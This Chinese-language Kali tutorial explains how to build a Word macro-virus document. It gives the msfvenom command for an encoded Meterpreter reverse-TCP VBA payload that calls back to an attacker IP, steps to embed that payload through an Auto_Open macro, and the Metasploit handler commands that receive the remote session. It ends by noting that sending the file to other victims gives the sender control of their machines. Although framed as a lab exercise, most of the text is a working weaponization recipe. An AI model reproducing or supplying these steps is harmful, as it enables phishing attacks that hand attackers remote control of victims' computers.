Kali渗透测试：使用Word宏病毒进行渗透攻击

Kali渗透测试：使用宏病毒进行渗透攻击

VBA是基于Visual Basic发展而来的，与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情，基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件，并且跨越了多种操作系统，宏病毒利用这一点得到了大范围的传播。

构造一个包含宏病毒的Word文件也并不复杂，只要编写一个Auto_Open函数，就可自动引发病毒。 在Word打开这个文件时， 宏病毒会执行， 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中， 因此总是把Word文件转成模版，再将其存储为宏。

实 验 环 境

攻击机：Linux kali 5.10.0 IP: 192.168.68.125

靶机：IE11-Win81

操 作 步 骤

1. 使用msfvenom生成VBA被控端

在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端，输入如下命令：

┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数，如下图所示：

第二部分是一些字符形式的攻击载荷，如下图所示：

2. 使用Word制作宏文件

使用Word将上图所示 两个部分制作成可以使用的宏文件。进入装有Office的Windows系统的靶机，然后打开Word（本人使用的是2007版），单击“开发工具”，接着在工具栏单击“宏”，就会弹出一个“宏”对话框，如下图所示：

起一个宏名，然后单击“创建”按钮，打开宏编辑界面，将我们在Kali 中生成的第一部分，也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中，覆盖原来的内容。如下图所示：

然后在工具栏上单击编辑图标，返回到Word操作界面，如下图所示：

在Word操作界面中，粘贴在KaliLinux中生成的第二部分，也就是字符形式的攻击载荷部分，如下图所示：

完成之后，将该木马文件保存，如下图所示：

3. 在Kali中启动metasploit

进入metasploit，启动和设置payload并执行，命令如下：

msf6 > use exploit/multi/handler
.....
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168.68.125
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.68.125:4444

4. 执行宏病毒文件

现在在靶机Win8中直接双击桌面上这个生成的木马文件（上图红框所示），在Kali中可以看到获得控制权限。如下图所示：

在会话界面，执行pwd命令，dir命令 ，结果如下图所示：

如果把宏病毒文件发给其他受害者，当受害者打开这个文件，里面的恶意HTA文件就会执行。在Kali中同样会得到控制权。在此不再赘述，本人已经亲测有效。